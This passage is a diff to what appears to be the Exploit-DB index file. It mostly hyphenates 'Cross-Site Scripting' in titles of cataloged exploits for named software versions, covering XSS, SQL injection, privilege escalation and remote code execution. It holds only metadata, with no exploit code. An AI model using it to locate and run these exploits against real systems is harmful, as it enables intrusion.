Injection",2013-01-06,"Henri Salo",php,webapps,0 38170,platforms/android/remote/38170.txt,"Facebook for Android 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 -38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component Multiple Cross Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 -38178,platforms/php/webapps/38178.txt,"WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross Site Scripting",2013-01-08,Am!r,php,webapps,0 +38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 +38178,platforms/php/webapps/38178.txt,"WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 -38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator Cross Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 +38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 38180,platforms/php/webapps/38180.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0 38176,platforms/php/webapps/38176.txt,"EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 38177,platforms/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos,0 @@ -34502,7 +34502,7 @@ id,file,description,date,author,platform,type,port 38202,platforms/windows/local/38202.txt,"Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38205,platforms/multiple/dos/38205.py,"BT Home Hub 'uuid' field Buffer Overflow",2013-01-08,"Zachary Cutlip",multiple,dos,0 38206,platforms/windows/remote/38206.html,"Samsung Kies Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0 -38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 +38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross-Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 38208,platforms/multiple/dos/38208.py,"Colloquy Remote Denial of Service",2013-01-09,Aph3x,multiple,dos,0 38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 38210,platforms/php/webapps/38210.txt,"Kirby CMS 2.1.0 - CSRF Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 @@ -34525,13 +34525,13 @@ id,file,description,date,author,platform,type,port 38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 User-Agent Header Handling Remote Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0 38228,platforms/php/webapps/38228.txt,"phpLiteAdmin 'table' Parameter SQL Injection",2013-01-15,KedAns-Dz,php,webapps,0 38229,platforms/php/webapps/38229.txt,"IP.Gallery 'img' Parameter SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 -38230,platforms/multiple/remote/38230.txt,"Apache OFBiz 10.4.x Multiple Cross Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote,0 -38231,platforms/php/webapps/38231.txt,"Scripts Genie Classified Ultra - SQL Injection / Cross Site Scripting",2013-01-20,3spi0n,php,webapps,0 +38230,platforms/multiple/remote/38230.txt,"Apache OFBiz 10.4.x Multiple Cross-Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote,0 +38231,platforms/php/webapps/38231.txt,"Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting",2013-01-20,3spi0n,php,webapps,0 38232,platforms/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility Buffer Overflow",2013-01-21,anonymous,linux,local,0 38233,platforms/hardware/remote/38233.txt,"F5 Networks BIG-IP XML External Entity Injection",2013-01-21,anonymous,hardware,remote,0 38234,platforms/php/webapps/38234.txt,"DigiLIBE Execution-After-Redirect Information Disclosure",2013-01-22,"Robert Gilbert",php,webapps,0 -38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web Multiple Cross Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0 -38236,platforms/php/webapps/38236.txt,"gpEasy CMS 'section' Parameter Cross Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 +38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0 +38236,platforms/php/webapps/38236.txt,"gpEasy CMS 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection",2013-01-25,AkaStep,php,webapps,0 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0 @@ -34544,8 +34544,8 @@ id,file,description,date,author,platform,type,port 38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote,0 38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 -38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 -38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting",2013-01-24,hiphop,php,webapps,0 +38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 +38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 @@ -34585,12 +34585,12 @@ id,file,description,date,author,platform,type,port 38292,platforms/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps,0 38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter XSS",2013-02-06,L0n3ly-H34rT,php,webapps,0 -38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 +38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 38297,platforms/php/webapps/38297.txt,"WordPress Wysija Newsletters Plugin Multiple SQL Injection",2013-02-06,"High-Tech Bridge",php,webapps,0 38298,platforms/linux/local/38298.txt,"xNBD '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local,0 38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 Local Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 -38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting",2013-01-31,hiphop,php,webapps,0 -38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 +38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 +38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,Metasploit,multiple,remote,6667 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 @@ -34600,30 +34600,30 @@ id,file,description,date,author,platform,type,port 38309,platforms/php/webapps/38309.txt,"osCommerce Cross Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 38310,platforms/android/remote/38310.c,"Android 2.3.5 PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 -38312,platforms/php/webapps/38312.txt,"AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 +38312,platforms/php/webapps/38312.txt,"AbanteCart 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 38313,platforms/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote,0 38314,platforms/php/webapps/38314.txt,"WordPress NextGEN Gallery Plugin Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0 -38315,platforms/php/webapps/38315.txt,"Sonar Multiple Cross Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 +38315,platforms/php/webapps/38315.txt,"Sonar Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent XSS",2015-09-25,hyp3rlinx,cgi,webapps,0 38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - .qfl Crash PoC",2015-09-25,Un_N0n,windows,dos,0 -38318,platforms/asp/webapps/38318.txt,"MIMEsweeper For SMTP Multiple Cross Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps,0 +38318,platforms/asp/webapps/38318.txt,"MIMEsweeper For SMTP Multiple Cross-Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps,0 38319,platforms/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,windows,local,0 -38320,platforms/php/webapps/38320.txt,"Squirrelcart 'table' Parameter Cross Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps,0 +38320,platforms/php/webapps/38320.txt,"Squirrelcart 'table' Parameter Cross-Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps,0 38321,platforms/php/webapps/38321.txt,"X2Engine 4.2 - CSRF",2015-09-25,Portcullis,php,webapps,80 -38322,platforms/php/webapps/38322.txt,"CKEditor 'posteddata.php' Cross Site Scripting",2013-02-19,AkaStep,php,webapps,0 +38322,platforms/php/webapps/38322.txt,"CKEditor 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,php,webapps,0 38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80 -38324,platforms/php/webapps/38324.txt,"WordPress Pretty Link Plugin Cross Site Scripting",2013-02-20,hiphop,php,webapps,0 +38324,platforms/php/webapps/38324.txt,"WordPress Pretty Link Plugin Cross-Site Scripting",2013-02-20,hiphop,php,webapps,0 38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin Cross Site Request Forgery",2013-02-18,QSecure,windows,remote,0 -38326,platforms/php/webapps/38326.txt,"Zenphoto 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 -38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross Site Scripting",2013-02-21,TheMirkin,php,webapps,0 -38328,platforms/php/webapps/38328.txt,"OpenEMR 'site' Parameter Cross Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 -38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Parameter Cross Site Scripting",2013-02-20,MustLive,php,webapps,0 +38326,platforms/php/webapps/38326.txt,"Zenphoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 +38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps,0 +38328,platforms/php/webapps/38328.txt,"OpenEMR 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 +38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting",2013-02-20,MustLive,php,webapps,0 38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 -38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 -38332,platforms/php/webapps/38332.txt,"Batavi 'index.php' Cross Site Scripting",2013-03-01,Dognaedis,php,webapps,0 +38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 +38332,platforms/php/webapps/38332.txt,"Batavi 'index.php' Cross-Site Scripting",2013-03-01,Dognaedis,php,webapps,0 38333,platforms/php/webapps/38333.txt,"phpMyRecipes Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0 -38334,platforms/jsp/webapps/38334.txt,"JForum 'jforum.page' Multiple Cross Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0 -38335,platforms/php/webapps/38335.txt,"Geeklog Cross Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps,0 +38334,platforms/jsp/webapps/38334.txt,"JForum 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0 +38335,platforms/php/webapps/38335.txt,"Geeklog Cross-Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps,0 38336,platforms/windows/dos/38336.py,"Git-1.9.5 ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0 38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash PoC",2015-09-28,"Mohammad Reza Espargham",ios,dos,0 38338,platforms/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,jsp,webapps,80 @@ -34643,11 +34643,11 @@ id,file,description,date,author,platform,type,port 38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer Remote Code Execution",2015-09-29,Metasploit,windows,remote,8400 38353,platforms/linux/local/38353.txt,"Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation",2015-09-29,halfdog,linux,local,0 38354,platforms/php/webapps/38354.txt,"Plogger Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 -38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin 'blog' Parameter Cross Site Scripting",2013-03-01,CodeV,php,webapps,0 +38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 38356,platforms/hardware/remote/38356.txt,"Foscam Prior to 11.37.2.49 Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0 38357,platforms/linux/local/38357.c,"rpi-update Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0 -38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 -38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 +38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 +38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,Metasploit,multiple,remote,0 38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,Metasploit,windows,remote,0 @@ -34656,16 +34656,16 @@ id,file,description,date,author,platform,type,port 38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0 38365,platforms/linux/dos/38365.txt,"Squid 'httpMakeVaryMark()' Function Remote Denial of Service",2013-03-05,tytusromekiatomek,linux,dos,0 38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0 -38367,platforms/php/webapps/38367.txt,"Your Own Classifieds Cross Site Scripting",2013-03-08,"Rafay Baloch",php,webapps,0 -38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0 +38367,platforms/php/webapps/38367.txt,"Your Own Classifieds Cross-Site Scripting",2013-03-08,"Rafay Baloch",php,webapps,0 +38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0 38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 38372,platforms/php/webapps/38372.html,"Question2Answer Cross Site Request Forgery",2013-03-01,MustLive,php,webapps,0 38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 -38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 -38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 -38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting",2013-03-11,hiphop,php,webapps,0 +38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 +38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 +38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - CSRF",2015-10-02,hyp3rlinx,windows,webapps,0 @@ -34679,13 +34679,13 @@ id,file,description,date,author,platform,type,port 38388,platforms/windows/remote/38388.txt,"QlikView '.qvw' File Remote Integer Overflow",2013-03-13,"A. Antukh",windows,remote,0 38389,platforms/hardware/remote/38389.txt,"Cisco Video Surveillance Operations Manager Multiple Security Vulnerabilities",2013-03-13,b.saleh,hardware,remote,0 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0 -38391,platforms/php/webapps/38391.txt,"Petite Annonce Cross Site Scripting",2013-03-14,Metropolis,php,webapps,0 +38391,platforms/php/webapps/38391.txt,"Petite Annonce Cross-Site Scripting",2013-03-14,Metropolis,php,webapps,0 38392,platforms/linux/dos/38392.txt,"MySQL and MariaDB Geometry Query Denial Of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote,0 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Parameter Open Redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 -38537,platforms/php/webapps/38537.txt,"WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross Site Scripting",2013-05-27,k3170makan,php,webapps,0 +38537,platforms/php/webapps/38537.txt,"WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM 4.3 - CSRF",2015-10-05,"MohamadReza Mohajerani",php,webapps,0 38403,platforms/win_x86/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win_x86,local,0 @@ -34693,15 +34693,15 @@ id,file,description,date,author,platform,type,port 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - RCE Through File Upload Filter Bypass",2015-10-06,"Raffaele Forte",php,webapps,0 -38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross Site Scripting",2013-03-23,Metropolis,php,webapps,0 +38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - CSRF",2015-10-07,hyp3rlinx,python,webapps,0 -38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 -38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 -38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 -38415,platforms/asp/webapps/38415.txt,"C2 WebResource 'File' Parameter Cross Site Scripting",2013-04-03,anonymous,asp,webapps,0 -38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 +38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 +38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 +38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 +38415,platforms/asp/webapps/38415.txt,"C2 WebResource 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 +38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 38417,platforms/php/webapps/38417.txt,"Symphony 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 38418,platforms/php/webapps/38418.txt,"FUDforum Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 38419,platforms/windows/dos/38419.txt,"SmallFTPD Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 @@ -34721,17 +34721,17 @@ id,file,description,date,author,platform,type,port 38433,platforms/php/webapps/38433.txt,"PHP Address Book /addressbook/register/user_add_save.php email Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38434,platforms/php/webapps/38434.txt,"PHP Address Book /addressbook/register/checklogin.php username Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38435,platforms/php/webapps/38435.txt,"PHP Address Book /addressbook/register/admin_index.php q Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38436,platforms/php/webapps/38436.txt,"Zimbra 'aspell.php' Cross Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 +38436,platforms/php/webapps/38436.txt,"Zimbra 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 38438,platforms/php/webapps/38438.txt,"EasyPHP 'index.php' Authentication Bypass and Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 -38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 -38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 +38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 +38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - DoS",2015-10-11,"Aria Akhavan Rezayat",php,dos,0 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL injection",2015-10-11,"Omer Ramić",php,webapps,0 -38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 +38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension / File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0 